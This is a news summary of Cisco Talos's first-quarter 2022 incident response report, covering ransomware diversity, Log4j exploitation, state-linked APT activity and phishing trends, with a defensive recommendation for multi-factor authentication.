Extortion Diversity, Personal Goals
The Cisco Talos Incident Response (CTIR) team still sees ransomware at the forefront of cybercriminals’ activities in the first quarter of 2022. Cisco Talos is one of the world’s leading threat research units, which is currently also helping with Ukraine’s cyber defense. The quarterly report deals, among other things, with the ongoing exploitation of the Log4j vulnerability and the increase in APT attacks.
- Extortion remains: Ransomware is still the biggest threat
- Diversity is coming: No ransomware family was observed twice in the ransomware attacks
- Personal goals: There were also more threats using social engineering techniques than ever before
The Cisco Talos Incident Response (CTIR) team, supported by the world’s largest commercial threat intelligence organization, has released its quarterly Threat Assessment Report for the first quarter of 2022. According to him, ransomware is still the biggest threat. The trend of past quarters has thus continued seamlessly since 2020. In the first quarter of 2022, there was also an increase in deployments related to advanced threats (APT). These included the MuddyWater APT activities sponsored by the Iranian state, as well as the Mustang Panda activities assigned to China. The latter use USB drives to distribute the PlugX remote access Trojan (RAT). An alleged Chinese attacker with the name “Deep Panda” took advantage of the Log4j vulnerability.
As in previous quarters, the telecommunications industry was one of the most frequently attacked sectors of the economy. At a short distance, organizations in the education system and public administration follow.
Interestingly, no ransomware family was observed twice during the ransomware attacks in the first quarter of 2022. This is a sign of a greater heterogeneity of ransomware attackers. Cisco Talos was able to observe this trend last year. New ransomware families also appeared in this quarter, including Cerber (also known as CerberImposter), Entropy and Cuba. Similarly, high-profile ransomware families such as Hive and Conti could be observed. According to the analysis of the CTIR team, ransomware attackers also exfiltrated sensitive data in the current quarter to carry out a double blackmail. This trend has been evident since the winter of 2019.
In a Cerber ransomware incident involving a holding company, the attacker exploited vulnerabilities in GitLab to upload and execute code remotely. As a result, he ultimately received access to this system in the context of the “git” account. This approach coincides with reports from other security companies about a new version of Cerber ransomware targeting Atlassian Confluence and GitLab servers with older RCE vulnerabilities.
Ransomware was followed by the exploitation of Log4j as the second most common threat vector. The Apache logging utility is used by companies around the world. In January 2022, the CTIR team observed a growing number of activities in which attackers tried to exploit Log4j in vulnerable VMware Horizon servers.
In most attacks, it was difficult to identify an initial vector, which is due to shortcomings in logging and visibility. However, there were also missions where the original vector could be confirmed or where the team could at least assume it. In these cases, attackers exploited publicly accessible applications vulnerable to Log4j.
“Many of these attacks could have been prevented,” says Holger Unterbrink, Technical Leader of Cisco Talos in Germany. “Based on the attacks studied, we strongly recommend multi-factor authentication for all major services, especially endpoint detection response solutions.“
The CTIR team has compiled further findings:
- Attacks via phishing continued to increase, in which a malicious link or a document was used. At the same time, threats via social engineering techniques rose to a new high. The phishing tools always disguised themselves better as legitimate files or utilities.
- The CTIR team saw an increase in techniques aimed at unpatched and publicly available applications.
- In comparison with the previous quarters, it was possible to note a sharp increase in activities aimed at circumventing defense measures and collecting data. Interesting for the attackers were details about specific hosts, keylogging to collect credentials, as well as the selection of files for subsequent exfiltration for multiple extortion.
- As in the last quarter, utilities such as PsExec and Cobalt Strike, as well as remote access software, were generally used for attacks.